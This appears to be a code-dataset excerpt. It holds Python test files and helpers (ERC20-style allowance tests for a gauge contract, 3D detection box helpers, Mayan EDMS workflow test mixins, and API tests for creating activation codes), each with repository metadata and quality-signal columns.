    rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
    rewards_only_gauge.approve(accounts[1], 12345678, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 12345678
def test_revoke_approve(rewards_only_gauge, accounts):
    rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
    rewards_only_gauge.approve(accounts[1], 0, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 0
def test_approve_self(rewards_only_gauge, accounts):
    rewards_only_gauge.approve(accounts[0], 10 ** 19, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[0], accounts[0]) == 10 ** 19
def test_only_affects_target(rewards_only_gauge, accounts):
    rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[1], accounts[0]) == 0
def test_returns_true(rewards_only_gauge, accounts):
    tx = rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
    assert tx.return_value is True
def test_approval_event_fires(accounts, rewards_only_gauge):
    tx = rewards_only_gauge.approve(accounts[1], 10 ** 19, {"from": accounts[0]})
    assert len(tx.events) == 1
    assert tx.events["Approval"].values() == [accounts[0], accounts[1], 10 ** 19]
def test_increase_allowance(accounts, rewards_only_gauge):
    rewards_only_gauge.approve(accounts[1], 100, {"from": accounts[0]})
    rewards_only_gauge.increaseAllowance(accounts[1], 403, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 503
def test_decrease_allowance(accounts, rewards_only_gauge):
    rewards_only_gauge.approve(accounts[1], 100, {"from": accounts[0]})
    rewards_only_gauge.decreaseAllowance(accounts[1], 34, {"from": accounts[0]})
    assert rewards_only_gauge.allowance(accounts[0], accounts[1]) == 66
- `avg_line_length` | `max_line_length` | `alphanum_fraction`: 36.409091 | 81 | 0.729921
- quality signals (`qsc_*_quality_signal`, in schema order): 335 | 2,403 | 4.979104 | 0.149254 | 0.204436 | 0.297362 | 0.151679 | 0.736811 | 0.736811 | 0.736811 | 0.736811 | 0.684053 | 0.651079 | 0 | 0.057265 | 0.120682 | 2,403 | 65 | 82 | 36.969231 | 0.732134 | 0 | 0 | 0.222222 | 0 | 0 | 0.026217 | 0 | 0 | 0 | 0 | 0 | 0.305556 | 1 | 0.277778 | false | 0 | 0.027778 | 0 | 0.305556 | 0
- raw signal columns (`qsc_*`, in schema order): 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0
- `effective`: 0 | `hits`: 7
Row 5: `hexsha` a2edea30c0c984fb98ee3f06934a11216aa7c92b, `size` 1,612, `ext` py, `lang` Python
- max_stars: path `source/02_ssd_large/lib/predict.py`, repo `toshi-k/kaggle-3d-object-detection-for-autonomous-vehicles`, head af2e0db16281fb997a9bd5149c478095128a627e, licenses ["MIT"], count 24, events 2019-11-28T05:54:58.000Z to 2021-06-14T07:38:30.000Z
- max_issues: path `source/03_ssd_small/lib/predict.py`, same repo and head, licenses ["MIT"], count null, events null
- max_forks: path `source/03_ssd_small/lib/predict.py`, same repo and head, licenses ["MIT"], count 5, events 2019-12-06T05:59:32.000Z to 2021-09-16T13:30:29.000Z
- `content`:
def predict_boxes(input_tensor, i, x, y, b=0):
    assignment = input_tensor[b, 17 * i: 17 * i + 10, x, y]
    predict_x = input_tensor[b, 17 * i + 10, x, y]
    predict_y = input_tensor[b, 17 * i + 11, x, y]
    predict_length = input_tensor[b, 17 * i + 12, x, y]
    predict_width = input_tensor[b, 17 * i + 13, x, y]
    predict_rotate = input_tensor[b, 17 * i + 16, x, y]
    return assignment, predict_x, predict_y, predict_length, predict_width, predict_rotate
def predict_boxes_numpy(input_tensor, i, x, y):
    assignment = input_tensor[17 * i: 17 * i + 10, x, y]
    predict_x = input_tensor[17 * i + 10, x, y]
    predict_y = input_tensor[17 * i + 11, x, y]
    predict_length = input_tensor[17 * i + 12, x, y]
    predict_width = input_tensor[17 * i + 13, x, y]
    predict_rotate = input_tensor[17 * i + 16, x, y]
    return assignment, predict_x, predict_y, predict_length, predict_width, predict_rotate
def predict_boxes_numpy_3d(input_tensor, i, x, y):
    assignment = input_tensor[17 * i: 17 * i + 10, x, y]
    predict_x = input_tensor[17 * i + 10, x, y]
    predict_y = input_tensor[17 * i + 11, x, y]
    predict_length = input_tensor[17 * i + 12, x, y]
    predict_width = input_tensor[17 * i + 13, x, y]
    predict_z = input_tensor[17 * i + 14, x, y]
    predict_height = input_tensor[17 * i + 15, x, y]
    predict_rotate = input_tensor[17 * i + 16, x, y]
    return assignment, predict_x, predict_y, predict_length, predict_width, predict_rotate, predict_z, predict_height
def predict_assignment(input_tensor, i, x, y):
    return input_tensor[17 * i: 17 * i + 10, x, y]
- `avg_line_length` | `max_line_length` | `alphanum_fraction`: 35.822222 | 117 | 0.649504
- quality signals (`qsc_*_quality_signal`, in schema order): 276 | 1,612 | 3.554348 | 0.097826 | 0.280326 | 0.155963 | 0.214067 | 0.873598 | 0.827727 | 0.827727 | 0.827727 | 0.827727 | 0.686035 | 0 | 0.0752 | 0.224566 | 1,612 | 44 | 118 | 36.636364 | 0.7096 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0.035714 | 0.285714 | 0
- raw signal columns (`qsc_*`, in schema order): 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- `effective`: 0 | `hits`: 8
Row 6: `hexsha` 0c02bf843c0549e3e5cc24fb817c8a796dcedd7f, `size` 16,898, `ext` py, `lang` Python
- max_stars: path `mayan/apps/document_states/tests/mixins/workflow_template_transition_mixins.py`, repo `bonitobonita24/Mayan-EDMS`, head 7845fe0e1e83c81f5d227a16116397a3d3883b85, licenses ["Apache-2.0"], count 343, events 2015-01-05T14:19:35.000Z to 2018-12-10T19:07:48.000Z
- max_issues: same path, repo, and head, licenses ["Apache-2.0"], count 191, events 2015-01-03T00:48:19.000Z to 2018-11-30T09:10:25.000Z
- max_forks: same path, repo, and head, licenses ["Apache-2.0"], count 114, events 2015-01-08T20:21:05.000Z to 2018-12-10T19:07:53.000Z
- `content`:
from django.db.models import Q
from mayan.apps.events.classes import EventType
from ...models import (
WorkflowTransition, WorkflowTransitionField,
WorkflowTransitionTriggerEvent
)
from ..literals import (
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL_EDITED,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL,
TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED
)
class WorkflowTransitionFieldViewTestMixin:
def _request_workflow_template_transition_field_create_view(self):
pk_list = list(
WorkflowTransitionField.objects.values_list('pk', flat=True)
)
response = self.post(
viewname='document_states:workflow_template_transition_field_create',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
)
try:
self._test_workflow_template_transition_field = WorkflowTransitionField.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransitionField.DoesNotExist:
self._test_workflow_template_transition_field = None
return response
def _request_workflow_template_transition_field_delete_view(self):
return self.post(
viewname='document_states:workflow_template_transition_field_delete',
kwargs={
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}
)
def _request_workflow_template_transition_field_edit_view(self):
return self.post(
viewname='document_states:workflow_template_transition_field_edit',
kwargs={
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}, data={
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL_EDITED,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
)
def _request_test_workflow_template_transition_field_list_view(self):
return self.get(
viewname='document_states:workflow_template_transition_field_list',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
class WorkflowTemplateTransitionAPIViewTestMixin:
def _request_test_workflow_template_transition_create_api_view(
self, extra_data=None
):
data = {
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL,
'origin_state_id': self._test_workflow_template_states[0].pk,
'destination_state_id': self._test_workflow_template_states[1].pk
}
if extra_data:
data.update(extra_data)
pk_list = list(
WorkflowTransition.objects.values_list('pk', flat=True)
)
response = self.post(
viewname='rest_api:workflow-template-transition-list', kwargs={
'workflow_template_id': self._test_workflow_template.pk
}, data=data
)
try:
self._test_workflow_template_transition = WorkflowTransition.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransition.DoesNotExist:
self._test_workflow_template_transition = None
return response
def _request_test_workflow_template_transition_delete_api_view(self):
return self.delete(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_detail_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_list_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk
}
)
def _request_test_workflow_template_transition_edit_patch_api_view(self):
return self.patch(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED,
'origin_state_id': self._test_workflow_template_states[1].pk,
'destination_state_id': self._test_workflow_template_states[0].pk
}
)
def _request_test_workflow_template_transition_edit_put_api_view_via(self):
return self.put(
viewname='rest_api:workflow-template-transition-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED,
'origin_state_id': self._test_workflow_template_states[1].pk,
'destination_state_id': self._test_workflow_template_states[0].pk
}
)
class WorkflowTransitionFieldAPIViewTestMixin:
def _request_test_workflow_template_transition_field_create_api_view(self):
pk_list = list(WorkflowTransitionField.objects.values_list('pk'))
response = self.post(
viewname='rest_api:workflow-template-transition-field-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
}, data={
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
)
try:
self._test_workflow_template_transition_field = WorkflowTransitionField.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransitionField.DoesNotExist:
self._test_workflow_template_transition_field = None
return response
def _request_test_workflow_template_transition_field_delete_api_view(self):
return self.delete(
viewname='rest_api:workflow-template-transition-field-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}
)
def _request_test_workflow_template_transition_field_detail_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-field-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}
)
def _request_test_workflow_template_transition_field_edit_via_patch_api_view(self):
return self.patch(
viewname='rest_api:workflow-template-transition-field-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_field_id': self._test_workflow_template_transition_field.pk
}, data={
'label': '{} edited'.format(
self._test_workflow_template_transition_field
)
}
)
def _request_test_workflow_template_transition_field_list_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-field-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
class WorkflowTransitionFieldTestMixin:
def _create_test_workflow_template_transition_field(self, extra_data=None):
kwargs = {
'field_type': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_TYPE,
'name': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_NAME,
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_LABEL,
'help_text': TEST_WORKFLOW_TEMPLATE_TRANSITION_FIELD_HELP_TEXT
}
kwargs.update(extra_data or {})
self._test_workflow_template_transition_field = self._test_workflow_template_transition.fields.create(
**kwargs
)
class WorkflowTemplateTransitionTriggerAPIViewTestMixin:
def _request_test_workflow_template_transition_trigger_create_api_view(self):
data = {
'event_type_id': self._test_event_type.id
}
pk_list = list(
WorkflowTransitionTriggerEvent.objects.values_list(
'pk', flat=True
)
)
response = self.post(
viewname='rest_api:workflow-template-transition-trigger-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data=data
)
try:
self._test_workflow_template_transition_trigger = WorkflowTransitionTriggerEvent.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransitionTriggerEvent.DoesNotExist:
self._test_workflow_template_transition_trigger = None
return response
def _request_test_workflow_template_transition_trigger_delete_api_view(self):
return self.delete(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}
)
def _request_test_workflow_template_transition_trigger_detail_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}
)
def _request_test_workflow_template_transition_trigger_list_api_view(self):
return self.get(
viewname='rest_api:workflow-template-transition-trigger-list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_trigger_edit_patch_api_view(self):
return self.patch(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}, data={
'event_type_id': self._test_event_type.id
}
)
def _request_test_workflow_template_transition_trigger_edit_put_api_view(self):
return self.put(
viewname='rest_api:workflow-template-transition-trigger-detail',
kwargs={
'workflow_template_id': self._test_workflow_template.pk,
'workflow_template_transition_id': self._test_workflow_template_transition.pk,
'workflow_template_transition_trigger_id': self._test_workflow_template_transition_trigger.pk
}, data={
'event_type_id': self._test_event_type.id
}
)
class WorkflowTemplateTransitionTriggerTestMixin:
def setUp(self):
super().setUp()
self._test_workflow_template_transition_triggers = []
def _create_test_workflow_template_transition_trigger(self):
event_type = EventType.get(id=self._test_event_type.id)
self._test_workflow_template_transition_trigger = self._test_workflow_template_transition.trigger_events.create(
event_type=event_type.get_stored_event_type()
)
self._test_workflow_template_transition_triggers.append(
self._test_workflow_template_transition_trigger
)
class WorkflowTemplateTransitionTriggerViewTestMixin:
def _request_test_workflow_template_transition_event_list_view(self):
return self.get(
viewname='document_states:workflow_template_transition_triggers',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
class WorkflowTemplateTransitionViewTestMixin:
def _request_test_workflow_template_transition_create_view(self):
pk_list = list(
WorkflowTransition.objects.values_list('pk', flat=True)
)
response = self.post(
viewname='document_states:workflow_template_transition_create',
kwargs={
'workflow_template_id': self._test_workflow_template.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL,
'origin_state': self._test_workflow_template_states[0].pk,
'destination_state': self._test_workflow_template_states[1].pk
}
)
try:
self._test_workflow_template_transition = WorkflowTransition.objects.get(
~Q(pk__in=pk_list)
)
except WorkflowTransition.DoesNotExist:
self._test_workflow_template_transition = None
return response
def _request_test_workflow_template_transition_delete_view(self):
return self.post(
viewname='document_states:workflow_template_transition_delete',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}
)
def _request_test_workflow_template_transition_edit_view(self):
return self.post(
viewname='document_states:workflow_template_transition_edit',
kwargs={
'workflow_template_transition_id': self._test_workflow_template_transition.pk
}, data={
'label': TEST_WORKFLOW_TEMPLATE_TRANSITION_LABEL_EDITED,
'origin_state': self._test_workflow_template_states[0].pk,
'destination_state': self._test_workflow_template_states[1].pk
}
)
def _request_test_workflow_template_transition_list_view(self):
return self.get(
viewname='document_states:workflow_template_transition_list',
kwargs={
'workflow_template_id': self._test_workflow_template.pk
}
)
- `avg_line_length` | `max_line_length` | `alphanum_fraction`: 41.214634 | 120 | 0.676471
- quality signals (`qsc_*_quality_signal`, in schema order): 1,700 | 16,898 | 6.164706 | 0.051176 | 0.314504 | 0.391985 | 0.28626 | 0.913454 | 0.906489 | 0.840649 | 0.806011 | 0.771183 | 0.731107 | 0 | 0.000795 | 0.255533 | 16,898 | 409 | 121 | 41.315403 | 0.832273 | 0 | 0 | 0.553009 | 0 | 0 | 0.17724 | 0.13327 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083095 | false | 0 | 0.011461 | 0.060172 | 0.191977 | 0
- raw signal columns (`qsc_*`, in schema order): 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
- `effective`: 0 | `hits`: 9
Row 7: `hexsha` 0c1bd497d7db16c0709031813426d095d2572a32, `size` 10,347, `ext` py, `lang` Python
- max_stars: path `case/Test_Environment/E_pos/E_pos_clientManager_createActivationCode.py`, repo `Four-sun/Requests_Load`, head 472f3f6d9bd407f1c4ed30a5557ec141e2434188, licenses ["Apache-2.0"], count null, events null
- max_issues: same path, repo, and head, licenses ["Apache-2.0"], count null, events null
- max_forks: same path, repo, and head, licenses ["Apache-2.0"], count null, events null
- `content`:
# -*- coding: utf-8 -*-
"""
Created: on 2018-04-19
@author: Four
Project: case\E-pos_clientManager_createActivationCode.py
URL: http://epos-pc-qa.eslink.net.cn/clientManager/createActivationCode
"""
import unittest
import os
import time
import sys
import requests
from case.Test_Environment.E_pos.Login_ecc import Login_ecc
from common.Request_Package import send_requests
from common.Excel_readline import ExcelUtil
from common.log import Logger
# 获取xlsx路径
path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
testxlsx = os.path.join(path, "config")
reportxlsx = os.path.join(testxlsx, "Epos-eccManager-testcase.xlsx")
Sheet_Name = "clientManager_createActivation"
logger_message = Logger()
send_time = time.strftime("%Y-%m-%d-%H_%M_%S", time.localtime(time.time()))
class clientManager_createActivationC(unittest.TestCase):
def test_SearchActionCode_1(self):
u"""正确的条件,成功创建一个激活码"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 0
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_2(self):
u"""创建激活码:没有条件调用接口"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 1
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_3(self):
u"""创建激活码:必输项检查:merchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 2
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_4(self):
u"""创建激活码:非必输项检查:ownerShip"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 3
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_5(self):
u"""创建激活码:必输项检查:creatNum"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 4
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_6(self):
u"""创建激活码:输入项float字段类型校验:merchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 5
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_7(self):
u"""创建激活码:输入项int字段类型校验:creatNum"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 6
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_8(self):
u"""创建激活码输入项float字段类型校验:ownerShip"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 7
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_9(self):
u"""创建激活码:输入项float字段类型校验:subMerchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 8
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_10(self):
u"""创建激活码:输入项字段的特定类型校验:merchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 9
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_11(self):
u"""创建激活码:输入项字段的特定类型校验:subMerchantCode"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 10
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_12(self):
u"""创建激活码:输入项字段的特定类型校验:creatNum"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 11
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_13(self):
u"""创建激活码:输入项字段的特定类型校验:ownerShip"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 12
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_14(self):
u"""创建激活码:creatNum创建个数边界值:0"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 13
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_15(self):
u"""创建激活码:creatNum创建个数边界值:51"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 14
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
def test_SearchActionCode_16(self):
u"""创建激活码:特殊字符的校验"""
try:
data = ExcelUtil(reportxlsx,Sheet_Name).dict_data()
login_cookies=Login_ecc()
cookie=requests.utils.dict_from_cookiejar(login_cookies.cookies)
test_id = 15
s = requests.session()
res = send_requests(s, data[test_id], cookie)
self.assertTrue(res)
except Exception as Error:
logger_message.logwarning(u"%s\t方法名:%s\t异常原因:%s"%(send_time,sys._getframe().f_code.co_name,Error))
raise
if __name__ == '__main__':
unittest.main()
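# --- Editor's sketch (not part of the original module) -------------------------
# The sixteen cases above differ only in their Excel row index, so they could be
# driven by one data-parameterized test. This assumes the same reportxlsx,
# Sheet_Name, ExcelUtil, Login_ecc and send_requests helpers already used above.
import unittest
import requests

class clientManager_createActivationParametrized(unittest.TestCase):
    def test_all_excel_rows(self):
        data = ExcelUtil(reportxlsx, Sheet_Name).dict_data()
        cookie = requests.utils.dict_from_cookiejar(Login_ecc().cookies)
        for test_id, row in enumerate(data):
            # subTest keeps every row's result visible even if one row fails
            with self.subTest(test_id=test_id):
                s = requests.session()
                self.assertTrue(send_requests(s, row, cookie))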
| 38.180812
| 110
| 0.623659
| 1,246
| 10,347
| 4.938202
| 0.105939
| 0.062409
| 0.059808
| 0.067609
| 0.830814
| 0.830814
| 0.830814
| 0.830814
| 0.830814
| 0.830814
| 0
| 0.007473
| 0.262878
| 10,347
| 270
| 111
| 38.322222
| 0.799266
| 0.059341
| 0
| 0.707965
| 0
| 0
| 0.040854
| 0.006118
| 0
| 0
| 0
| 0
| 0.070796
| 1
| 0.070796
| false
| 0
| 0.039823
| 0
| 0.115044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c43d917fdf8ed40a2ce8ae986d5de6c80f8ba5f
| 5,231
|
py
|
Python
|
zkutil/test/test_zkconf.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | null | null | null |
zkutil/test/test_zkconf.py
|
wenbobuaa/pykit
|
